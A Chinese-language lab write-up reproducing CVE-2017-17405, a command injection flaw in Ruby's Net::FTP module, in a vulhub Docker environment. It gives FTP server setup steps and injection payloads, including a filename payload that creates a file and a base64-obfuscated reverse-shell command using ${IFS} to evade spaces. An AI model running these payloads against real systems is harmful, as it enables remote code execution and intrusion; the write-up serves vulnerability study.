跳转至

(CVE-2017-17405)Net::FTP 模块命令注入漏洞

一、漏洞简介

Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

二、漏洞影响

Ruby \< 2.4.3

三、复现过程

因为这是一个FTP客户端的漏洞,所以我们需要先运行一个可以被访问到的服务端。比如使用python:

# 安装pyftpdlib
pip install pyftpdlib

# 在当前目录下启动一个ftp服务器,默认监听在`0.0.0.0:2121`端口
python3 -m pyftpdlib -p 2121 -i 0.0.0.0

然后即可开始利用漏洞。注入命令|touch${IFS}success.txt(空格用${IFS}代替,原因不表),发送如下数据包即可(其中uri指定的ftp服务器就是我用python运行的一个简单的ftp server,其中无需放置任何文件):

1.png

然后进入docker容器内,可见success.txt已被创建:

2.png

执行反弹shell的命令|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA...}|{base64,-d}|{bash,-i}',成功反弹:

3.png

参考链接

https://vulhub.org/#/environments/ruby/CVE-2017-17405/